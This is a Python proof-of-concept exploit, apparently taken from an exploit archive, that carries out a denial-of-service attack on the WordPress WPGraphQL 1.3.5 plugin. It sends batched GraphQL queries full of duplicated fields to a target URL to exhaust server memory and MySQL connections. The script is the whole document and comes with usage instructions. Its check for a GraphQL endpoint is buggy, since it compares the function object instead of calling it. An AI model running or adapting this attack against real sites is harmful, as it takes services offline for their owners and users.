55 lines
No EOL
1.5 KiB
Python
Executable file
55 lines
No EOL
1.5 KiB
Python
Executable file
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
|
|
# Author: Dolev Farhi
|
|
# Date: 2021-04-12
|
|
# Vendor Homepage: https://www.wpgraphql.com/
|
|
# Version: 1.3.5
|
|
# Tested on: Ubuntu
|
|
|
|
|
|
"""
|
|
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
|
|
"""
|
|
|
|
import sys
|
|
import requests
|
|
|
|
|
|
def usage():
|
|
print('* WordPress GraphQL 1.3.5 Denial of Service *')
|
|
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
|
|
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
|
|
sys.exit(1)
|
|
|
|
if len(sys.argv) < 4:
|
|
print('Missing arguments!')
|
|
usage()
|
|
|
|
def wpgql_exists():
|
|
try:
|
|
r = requests.post(WORDPRESS_URL, json='x')
|
|
if 'GraphQL' in r.json()['errors'][0]['message']:
|
|
return True
|
|
except:
|
|
pass
|
|
return False
|
|
|
|
# This PoC assumes graphql is located at index.php?graphql
|
|
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
|
|
FORCE_MULTIPLIER = int(sys.argv[2])
|
|
CHAINED_REQUESTS = int(sys.argv[3])
|
|
|
|
if wpgql_exists is False:
|
|
print('Could not identify GraphQL running at "/index.php?graphql"')
|
|
sys.exit(1)
|
|
|
|
queries = []
|
|
|
|
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
|
|
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
|
|
|
|
for _ in range(0, CHAINED_REQUESTS):
|
|
queries.append(query)
|
|
|
|
r = requests.post(WORDPRESS_URL, json=queries)
|
|
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
|
|
print('Response:', r.json()) |